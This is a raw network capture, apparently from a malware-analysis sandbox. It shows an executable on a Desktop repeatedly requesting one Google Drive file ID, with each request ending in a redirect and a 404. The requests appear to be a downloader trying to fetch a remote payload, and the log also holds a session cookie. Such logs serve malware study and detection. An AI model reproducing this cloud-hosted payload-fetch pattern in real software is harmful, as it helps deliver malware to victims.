                                                        Content-Security-Policy: script-src 'nonce-jfBBg7CqfuES3iRANo0zmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7esx6BrnvM0LaBVwwcbk3EBnvewExtBtZLxpLHAm4ls9aC1kSK0v3ZZft3WNz-XLUjlbM
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:24 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CdFZfjsxmOX92Ld_IxKD5g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        6 | 192.168.11.20 | 49757 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:34 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:35 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:35 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-tW2Su85Eu-sDSXiNGc_Pqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        7 | 192.168.11.20 | 49758 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:35 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:35 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:35 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-qsoCTM7zQRXihrro6J53yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6aCsKJrMqKR-SWJ3Ne4FfW9hoxL195L1n3RcGCE9NcXw2I-vwrlnVBKjt96Xm_Tg9cT9WlmQgINg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:35 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aLr3m4dpCkuSGSxpZ6tyLQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        8 | 192.168.11.20 | 49759 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:46 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:46 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-_mnH2hEEyFM_65q-zUjZfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        9 | 192.168.11.20 | 49760 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:46 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:46 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:46 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-7TnWtPbsWZ7wmD8vRnGV0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5optG5Un4AE1YB_ns3GjnZPPjMsYeraNIJue9hWMqGActRp3nNp3l8WXwX9QovpBY7WEYDDnRwsw
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:46 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A-WUfKO8VIj-YMMkR1CzzA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        10 | 192.168.11.20 | 49761 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:57 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:57 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:57 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-QUSSF-e5l-Fnc_2_1oF4OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        11 | 192.168.11.20 | 49762 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:03:57 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:58 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:58 GMT
                                                        Content-Security-Policy: script-src 'nonce-icaGCId8_gFuSdVpjuZkXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC406yfPXNi0hDG2XfAmUFRhutX9VZPbMO3v_cKFkQUtD3MR5NZuswmQBbI95Yt3njF0DN8rBMljTg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:58 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N1QnIAWyed29unoLZI6I6Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        12 | 192.168.11.20 | 49763 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:08 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:08 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:08 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-gKf9A7JvjBh-oTnC2Z5lJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        13 | 192.168.11.20 | 49764 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:09 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:09 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:09 GMT
                                                        Content-Security-Policy: script-src 'nonce-Bc_2vepgCjqMuBTIqRBnpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4eVvjuM7JnlEacZhEo5fECOFN3i6ig_GkQRtxdJhXATneCuct0yPQ3qOY9tIV5Q2ehUt9ELSoS9w
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:09 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GBmVztenwPn1TLrtmOjNIQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 14 | Source IP: 192.168.11.20 | Source Port: 49765 | Destination IP: 142.250.217.238 | Destination Port: 443 | PID: 5216 | Process: C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:19 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
